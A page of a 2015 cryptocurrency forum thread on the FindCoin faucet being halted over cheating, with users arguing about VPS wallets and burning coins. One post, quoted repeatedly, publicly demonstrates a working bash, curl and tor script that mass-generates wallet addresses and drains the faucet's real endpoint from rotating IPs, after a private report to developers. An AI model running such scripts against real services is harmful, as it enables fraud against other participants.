Topic: [ANN][FIND] FindCoin | Update Wallet If You Haven't! | Community Anti-Scam Token - page 53. (Read 126380 times)
January 01, 2015, 02:40:40 PM
agree already vote for burn the funds on faucet
January 01, 2015, 02:38:54 PM
I must say just burn the coins,who even cares anymore.I was robbed by the process as well as the cheater pieces of sht who used VPNs and other methods.I had 20k coins and now get a whole 6k instead,sorry but its hard to stay very optimistic or positive about it all when I have already been screwed out of 14 k coins.Burn the rest and get the coin on an exchange.
January 01, 2015, 02:00:45 PM
burn the coins
January 01, 2015, 01:27:42 PM
Really, really, really great posts here. Want to see who is who overnight = leave thread for 24 hours 
January 01, 2015, 01:12:55 PM
Scammers don't like anti-scam coins and they do anything to kill them. The question is what can be done from here to succeed coin and achieve your goals?
PS. Voted!
PS. Voted!
January 01, 2015, 01:11:11 PM
January 01, 2015, 12:05:05 PM
I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
https://i.imgur.com/gtkGBMg.png
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
https://i.imgur.com/gtkGBMg.png
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
Code:
/path/to/tor --controlport 9051 &
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Code:
while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:[email protected]:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses. Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.we now can rename this coin to failcoin. byebye people
Yep, yet these skids are pointing their finger towards VPS users when it wasnt it.
http://www.popcrunch.com/wp-content/uploads/2010/12/bowl.jpg
Yep, ask the dev team how many coins they scammed out of the legal FindYouCoins owners....
January 01, 2015, 11:59:35 AM
I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
https://i.imgur.com/gtkGBMg.png
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
https://i.imgur.com/gtkGBMg.png
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
Code:
/path/to/tor --controlport 9051 &
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Code:
while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:[email protected]:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses. Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.we now can rename this coin to failcoin. byebye people
Yep, yet these skids are pointing their finger towards VPS users when it wasnt it.
http://www.popcrunch.com/wp-content/uploads/2010/12/bowl.jpg
January 01, 2015, 11:57:50 AM
Distribution is temporarily stopped due to cheaters
So I am guessing things got out of hand for the dev team (which was cheating as well in the first place) so now it is the fault of the cheaters?
You were warned long before this.
What made you change you mind?
Let me guess...
Not enough coins left for you to "collect"?
This was a scam coin to begin with.
I feel sorry for the FindYouCoin holders. 1000:1 towards a true scam coin?
tststststs
January 01, 2015, 10:50:17 AM
Distribution is temporarily stopped due to cheaters
January 01, 2015, 09:55:18 AM
have payouts stopped?, no payouts today!
January 01, 2015, 09:45:34 AM
whats going on with the distro?
January 01, 2015, 09:29:41 AM
I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.
Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
Code:
/path/to/tor --controlport 9051 &
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Code:
while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:[email protected]:13333/ | awk -F'"' '{print $4}' >> addresses;done
Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
we now can rename this coin to failcoin. byebye people
They gave it the old college try. I'll give them that.
January 01, 2015, 09:01:58 AM
I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.
Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.
This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.
Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.
First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal
Code:
/path/to/tor --controlport 9051 &
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Code:
while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:[email protected]:13333/ | awk -F'"' '{print $4}' >> addresses;done
Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
we now can rename this coin to failcoin. byebye people
January 01, 2015, 08:55:38 AM
I can translate into Italian language. 
January 01, 2015, 08:44:27 AM
@ Brah
Asinine, big word for a brah.
You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol
Use your equipment for well, MINING!!
Using exploits threw any method is actually cheating brah
atleast make sense.
Jealousy because you spend 30 dollars a month on vps are you for real?
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
Asinine, big word for a brah.
You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol
Use your equipment for well, MINING!!
Using exploits threw any method is actually cheating brah
atleast make sense.Jealousy because you spend 30 dollars a month on vps are you for real?
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
More resources for anything = higher yield.
Having VPS to get faucet isn't an exploit.
The coding using the URL to get the faucet with 100s of wallets on one PC/VPS = exploiting.
I suggest you refrain from flaming when your username is "HarryPotHead" and can barely manage making a single valid point.
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
Really, yet you don't see how my comparison to mining is more accurate (more mining rigs = more than "joe") vs your asinine comparison to robbing people at gunpoint? Anyways I won't waste any more time on you.
As for the coin, the lack of coding sunk the ship not the VPS resources.
I am sure you are unable to read brah, here let me help you out read carefully you may miss it,
You could not be more right, all these guys please don’t change it, (we deserve more coins because we brought vps/payed for our guns etc lol)
If you look payed for our guns etc LOL, now we know you have no sense of humour that is clear you also cannot read, you cheat and do not like being told you do, MINING IS PROOF OF WORK and has nothing in common with PROOF OF FAUCET which was designed for fair distribution,
As for flame war with a name LMAO again that is for someone who is stuck up their own ass.
I am so jealous you have vps not slightly annoyed that people make something fair unfair! When i opened the wallet i was getting 75Find an hour then you plonkers turn up and ruin it, so i closed wallet and not opened since, until i exchange FindYouCoins.
I spend less money to get more coins anyway i am so jealous haha
January 01, 2015, 08:35:51 AM
If the devs are still up for it, I can help out to make the faucet distribution a bit more secure and fair for everyone, advanced attacks will still be possible but they will probably cost more than the reward received.
January 01, 2015, 08:27:13 AM
@ Brah
Asinine, big word for a brah.
You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol
Use your equipment for well, MINING!!
Using exploits threw any method is actually cheating brah atleast make sense.
Jealousy because you spend 30 dollars a month on vps are you for real?
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
Asinine, big word for a brah.
You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol
Use your equipment for well, MINING!!
Using exploits threw any method is actually cheating brah
atleast make sense.Jealousy because you spend 30 dollars a month on vps are you for real?
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
More resources for anything = higher yield.
Having VPS to get faucet isn't an exploit.
The coding using the URL to get the faucet with 100s of wallets on one PC/VPS = exploiting.
I suggest you refrain from flaming when your username is "HarryPotHead" and can barely manage making a single valid point.
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
Really, yet you don't see how my comparison to mining is more accurate (more mining rigs = more than "joe") vs your asinine comparison to robbing people at gunpoint? Anyways I won't waste any more time on you.
As for the coin, the lack of coding sunk the ship not the VPS resources.
January 01, 2015, 08:19:47 AM
@ Brah
Asinine, big word for a brah.
You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol
Use your equipment for well, MINING!!
Using exploits threw any method is actually cheating brah atleast make sense.
Jealousy because you spend 30 dollars a month on vps are you for real?
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
Asinine, big word for a brah.
You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol
Use your equipment for well, MINING!!
Using exploits threw any method is actually cheating brah
atleast make sense.Jealousy because you spend 30 dollars a month on vps are you for real?
MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN!
January 01, 2015, 07:57:43 AM
Hello,
We have turned off the faucet for the moment, as it seems we are getting two thousand requests more than we should (we have ~1.3k wallets downloaded). A vote will be posted tomorrow to decide if we want to continue faucet-based distribution or switch to another system. Until then, no faucet payments will be sent out.
We have turned off the faucet for the moment, as it seems we are getting two thousand requests more than we should (we have ~1.3k wallets downloaded). A vote will be posted tomorrow to decide if we want to continue faucet-based distribution or switch to another system. Until then, no faucet payments will be sent out.
It is a great decision! Fair to us who do not cheat in this distribution, I just got 2k coins, but cheaters can get 100k or more, they have lots of VPS/VPN.
I have to disagree with the VPS thing.
If this were any other coin received through mining, VPS would obviously give more hashing power yielding more coins.
I have 3 VPS with wallets each and as you can see in my older btctalk posts; I usually provided tons of hashing power to newly created coins. Including helping Monero's first launch earlier this year.
I do have to agree however that this coin verifies nothing of the VPS specs meaning I could potentially just get free VPS to rape it but it isnt worth my time but is an obvious issue to all of us as it defeats the purpose of a fair launch (in comparison with those who have VPS mining rigs).
Totally agree. The idea of "faucet distribution" is fair. I have 5 VPSes and I have to pay for it. It's a kind of investment. If I have 5VPS and I receive the amount equal to someone who has only 1 PC, it will be unfair. This is "In-wallet-faucet-distribution", not "person-distribution". Moreover, I downloaded the wallet file only 1 time on the first VPS and transfer to the other 4 VPSes. I think if other people do the same thing as me, the downloaded wallet will be much less then the number of opening wallet. It's easy to understand.
Yeah right so if I bank robber pays for his gun and get away car, he deserves the cash
Trying to justify cheating, its a giveaway coin, meant to be one wallet per person, anyone doing otherwise cheated end of story.
Hello,
We have turned off the faucet for the moment, as it seems we are getting two thousand requests more than we should (we have ~1.3k wallets downloaded). A vote will be posted tomorrow to decide if we want to continue faucet-based distribution or switch to another system. Until then, no faucet payments will be sent out.
We have turned off the faucet for the moment, as it seems we are getting two thousand requests more than we should (we have ~1.3k wallets downloaded). A vote will be posted tomorrow to decide if we want to continue faucet-based distribution or switch to another system. Until then, no faucet payments will be sent out.
It is a great decision! Fair to us who do not cheat in this distribution, I just got 2k coins, but cheaters can get 100k or more, they have lots of VPS/VPN.
I have to disagree with the VPS thing.
If this were any other coin received through mining, VPS would obviously give more hashing power yielding more coins.
I have 3 VPS with wallets each and as you can see in my older btctalk posts; I usually provided tons of hashing power to newly created coins. Including helping Monero's first launch earlier this year.
I do have to agree however that this coin verifies nothing of the VPS specs meaning I could potentially just get free VPS to rape it but it isnt worth my time but is an obvious issue to all of us as it defeats the purpose of a fair launch (in comparison with those who have VPS mining rigs).
Totally agree. The idea of "faucet distribution" is fair. I have 5 VPSes and I have to pay for it. It's a kind of investment. If I have 5VPS and I receive the amount equal to someone who has only 1 PC, it will be unfair. This is "In-wallet-faucet-distribution", not "person-distribution". Moreover, I downloaded the wallet file only 1 time on the first VPS and transfer to the other 4 VPSes. I think if other people do the same thing as me, the downloaded wallet will be much less then the number of opening wallet. It's easy to understand.
Yeah right so if I bank robber pays for his gun and get away car, he deserves the cash
Trying to justify cheating, its a giveaway coin, meant to be one wallet per person, anyone doing otherwise cheated end of story.
+1
You could not be more right, all these guys please don’t change it, we deserve more coins because we brought vps/payed for our guns etc lol
The same people who keep asking for exchanges so they can dump and destroy the coin
You guys do realize how asinine you look?
So when a user has more resources to mine, its cheating? Okay now
Anyways, apparently this coin has too many exploits through weak security (coding). The VPS getting users more cash isn't cheating. That's just complete childish jealousy.
If you have more resources, you will gain more. Its not robbing. LOL. I can't believe you guys compared this to robbing people at gun point. LMFAO
Jump to: